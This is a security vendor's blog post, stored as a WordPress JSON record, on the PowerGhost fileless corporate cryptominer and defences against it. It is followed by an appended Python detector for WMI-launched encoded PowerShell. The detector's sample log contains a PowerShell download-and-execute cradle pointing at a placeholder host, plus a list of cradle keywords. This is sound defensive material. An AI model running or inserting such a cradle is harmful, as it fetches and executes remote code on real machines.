{"id":11516,"date":"2018-07-30T10:08:01","date_gmt":"2018-07-30T14:08:01","guid":{"rendered":"https:\/\/me-en.kaspersky.com\/blog\/powerghost-fileless-miner\/11516\/"},"modified":"2019-11-15T15:22:56","modified_gmt":"2019-11-15T11:22:56","slug":"powerghost-fileless-miner","status":"publish","type":"post","link":"https:\/\/me-en.kaspersky.com\/blog\/powerghost-fileless-miner\/11516\/","title":{"rendered":"PowerGhost: Beware of ghost mining"},"content":{"rendered":"<p>Our experts recently discovered a <a target=\"_blank\" href=\"https:\/\/www.kaspersky.com\/blog\/cryptominers-in-business\/22964\/\" rel=\"noopener noreferrer nofollow\">miner<\/a> aimed primarily at corporate networks. Because PowerGhost is fileless, it can settle on victims\u2019 workstations and servers without being noticed. Most of the attacks we\u2019ve registered so far have been in India, Turkey, Brazil, and Colombia.<\/p>\n<p>Having penetrated a company\u2019s infrastructure, PowerGhost spreads to other machines by logging in to network user accounts through Windows Management Instrumentation (WMI), a legitimate Windows management interface that administrators also use for remote administration. The logins and passwords it needs come from Mimikatz, a tool that extracts credentials from memory. The miner can also spread through the EternalBlue <a target=\"_blank\" href=\"https:\/\/encyclopedia.kaspersky.com\/glossary\/exploit\/?utm_source=kdaily&amp;utm_medium=blog&amp;utm_campaign=termin-explanation\" rel=\"noopener noreferrer\">exploit<\/a> for Windows, the same exploit used by the creators of <a target=\"_blank\" href=\"https:\/\/www.kaspersky.com\/blog\/wannacry-ransomware\/16518\/\" rel=\"noopener noreferrer nofollow\">WannaCry<\/a> and <a target=\"_blank\" href=\"https:\/\/www.kaspersky.com\/blog\/expetr-for-b2b\/17343\/\" rel=\"noopener noreferrer nofollow\">ExPetr<\/a>. 
The vulnerability it exploits was patched more than a year ago, yet the exploit keeps working in practice because many systems have never received the update.<\/p>\n<p>Once on a victim\u2019s device, the malware attempts to escalate its privileges through several OS vulnerabilities (see the <a target=\"_blank\" href=\"https:\/\/securelist.com\/a-mining-multitool\/86950\/\" rel=\"noopener noreferrer\">Securelist blog post<\/a> for technical details). It then establishes persistence on the system and starts mining cryptocurrency for its operators.<\/p>\n<h2>Why is PowerGhost dangerous?<\/h2>\n<p>Like any miner, PowerGhost uses your computing resources to generate cryptocurrency. That degrades the performance of servers and other devices and markedly accelerates their wear and tear, which brings forward replacement costs.<\/p>\n<p>Unlike most such programs, however, PowerGhost is harder to detect because it leaves no malicious files on the device for a file scanner to find. That means it can run unnoticed on a server or workstation for longer, and do more damage.<\/p>\n<p>What\u2019s more, in one version of the malware our experts found a DDoS module. Using a company\u2019s servers to bombard another victim with traffic can slow down or even paralyze the company\u2019s own operations. Another notable trait is the malware\u2019s ability to check whether it is running on a real operating system or in a sandbox, which lets it evade security solutions that rely on sandbox analysis.<\/p>\n<h3>PowerGhost-busters<\/h3>\n<p>To avoid infection and protect your equipment from PowerGhost and similar malware, keep a close watch on the security of your corporate network.<\/p>\n<ul>\n<li>Don\u2019t skip software and operating system updates. Every vulnerability the miner exploits was patched by its vendor long ago; malware authors routinely build on exploits for long-patched vulnerabilities because enough systems are still missing the fix.<\/li>\n<li>Raise employees\u2019 security awareness. 
Remember that many cyberincidents begin with human error.<\/li>\n<li>Use reliable security solutions with behavioral analysis technology. A threat that never writes a file to disk leaves nothing for a traditional file scanner to find, so it has to be caught by what it does on the system rather than by what it looks like. Kaspersky Lab\u2019s business products detect both PowerGhost and its individual components, as well as many other malicious programs, including ones currently unknown.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Fileless malware infects workstations and servers in corporate networks.<\/p>\n","protected":false},"author":2484,"featured_media":11517,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1318,1917],"tags":[1849,1729,1819,1032,1768,1429,521],"class_list":{"0":"post-11516","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-business","8":"category-smb","9":"tag-bodiless-malware","10":"tag-cryptojacking","11":"tag-cryptomining","12":"tag-ddos","13":"tag-endpoint","14":"tag-miners","15":"tag-threats"},"hreflang":[{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/powerghost-fileless-miner\/11516\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/powerghost-fileless-miner\/13753\/"},{"hreflang":"en-us","url":"https:\/\/usa.kaspersky.com\/blog\/powerghost-fileless-miner\/15815\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/powerghost-fileless-miner\/14095\/"},{"hreflang":"es-mx","url":"https:\/\/latam.kaspersky.com\/blog\/powerghost-fileless-miner\/13220\/"},{"hreflang":"es","url":"https:\/\/www.kaspersky.es\/blog\/powerghost-fileless-miner\/16598\/"},{"hreflang":"it","url":"https:\/\/www.kaspersky.it\/blog\/powerghost-fileless-miner\/16030\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/powerghost-fileless-miner\/20963\/"},
{"hreflang":"tr","url":"https:\/\/www.kaspersky.com.tr\/blog\/powerghost-fileless-miner\/5166\/"},{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/powerghost-fileless-miner\/23310\/"},{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/powerghost-fileless-miner\/10782\/"},{"hreflang":"pt-br","url":"https:\/\/www.kaspersky.com.br\/blog\/powerghost-fileless-miner\/10561\/"},{"hreflang":"pl","url":"https:\/\/plblog.kaspersky.com\/powerghost-fileless-miner\/9531\/"},{"hreflang":"de","url":"https:\/\/www.kaspersky.de\/blog\/powerghost-fileless-miner\/17369\/"},{"hreflang":"ja","url":"https:\/\/blog.kaspersky.co.jp\/powerghost-fileless-miner\/20964\/"},{"hreflang":"nl","url":"https:\/\/www.kaspersky.nl\/blog\/powerghost-fileless-miner\/23714\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/powerghost-fileless-miner\/17032\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/powerghost-fileless-miner\/20678\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/powerghost-fileless-miner\/20676\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/me-en.kaspersky.com\/blog\/tag\/threats\/","name":"threats"},"_links":{"self":[{"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/11516","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/users\/2484"}],"replies":[{"embeddable":true,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/comments?post=11516"}],"version-history":[{"count":6,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/11516\/revisions"}],"predecessor-version":[{"id":14642,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/11516\/revisions\/14642"}],
"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/media\/11517"}],"wp:attachment":[{"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/media?parent=11516"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/categories?post=11516"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/tags?post=11516"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
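The post's two technical points, lateral movement through WMI and a fileless payload that a file scanner cannot see, translate directly into a behavioural detection. The Python below is an added example, not code from the post or from Kaspersky's analysis. It assumes the fileless payload arrives as a PowerShell command started by the WMI provider host (WmiPrvSE.exe), which the post does not state explicitly, and the Sysmon-style log records, file paths and the cradle URL in it are constructed for the demonstration.

```python
"""
Behavioural check for WMI-launched fileless PowerShell (added example).

The rules run over constructed Sysmon process-creation records (Event ID 1)
flattened to key=value lines; nothing here is real PowerGhost telemetry.
"""
import base64
import re
from dataclasses import dataclass

# Tokens that typically appear in an in-memory PowerShell download cradle.
CRADLE_MARKERS = ("IEX", "Invoke-Expression", "DownloadString", "Net.WebClient", "FromBase64String")

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# key=value fields; the value is either "double quoted" or a run of non-space characters.
FIELD = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def encode_ps(command: str) -> str:
    """Encode a command the way `powershell -EncodedCommand` expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str):
    """Reverse of encode_ps; returns None for anything that is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_record(line: str) -> dict:
    """Turn one flattened `key=value key="quoted value"` log line into a dict."""
    return {key: (quoted if raw.startswith('"') else raw) for key, raw, quoted in FIELD.findall(line)}


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


def analyze(record: dict) -> list:
    """Apply the two behavioural rules to one process-creation record."""
    findings = []
    image = basename(record.get("Image", ""))
    parent = basename(record.get("ParentImage", ""))
    cmdline = record.get("CommandLine", "")
    from_wmi = parent == "wmiprvse.exe"

    # Rule 1: PowerShell whose parent is the WMI provider host, i.e. started by a (remote) WMI call.
    if from_wmi and image in ("powershell.exe", "pwsh.exe"):
        findings.append(Finding("wmi_spawned_powershell", "medium", f"{parent} -> {image}"))

    # Rule 2: an encoded command that decodes to a download-and-execute cradle.
    match = ENC_FLAG.search(cmdline)
    if match:
        decoded = decode_ps(match.group(1))
        if decoded is None:
            findings.append(Finding("undecodable_encoded_command", "low", match.group(1)[:16]))
        else:
            hits = [m for m in CRADLE_MARKERS if m.lower() in decoded.lower()]
            if hits:
                severity = "high" if from_wmi else "medium"
                findings.append(Finding("fileless_download_cradle", severity, ", ".join(hits)))
    return findings


def scan(log_text: str) -> list:
    """Return (line number, Finding) pairs for every Event ID 1 record in the log."""
    results = []
    for number, line in enumerate(log_text.splitlines(), 1):
        record = parse_record(line)
        if record.get("EventID") != "1":
            continue
        results.extend((number, f) for f in analyze(record))
    return results


# Constructed sample log. The cradle URL uses a reserved example domain, not a real server.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMI = r"C:\Windows\System32\wbem\WmiPrvSE.exe"
SAMPLE_LOG = "\n".join([
    f'EventID=1 Image={PS} ParentImage=C:\\Windows\\explorer.exe CommandLine="powershell.exe -File C:\\scripts\\backup.ps1"',
    f'EventID=1 Image={PS} ParentImage={WMI} CommandLine="powershell.exe -NoP -W Hidden -Enc {encode_ps(CRADLE)}"',
    f'EventID=1 Image={PS} ParentImage={WMI} CommandLine="powershell.exe -Command Get-Service"',
    f'EventID=1 Image={PS} ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine="powershell.exe -enc {encode_ps(CRADLE)}"',
    'EventID=3 Image=C:\\Windows\\System32\\svchost.exe DestinationPort=445',
])

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(f"line {number}: [{finding.severity}] {finding.rule} ({finding.detail})")
```

Run as a script it prints one finding per matched rule. The benign `-File` launch on the first line produces nothing; the WMI-launched encoded cradle on the second line triggers both rules and is rated high; the plain `Get-Service` from WMI triggers only the parent-process rule. The decoded command line is the part a file-based scanner never sees, which is why the rule keys on the process relationship and the command content rather than on anything written to disk.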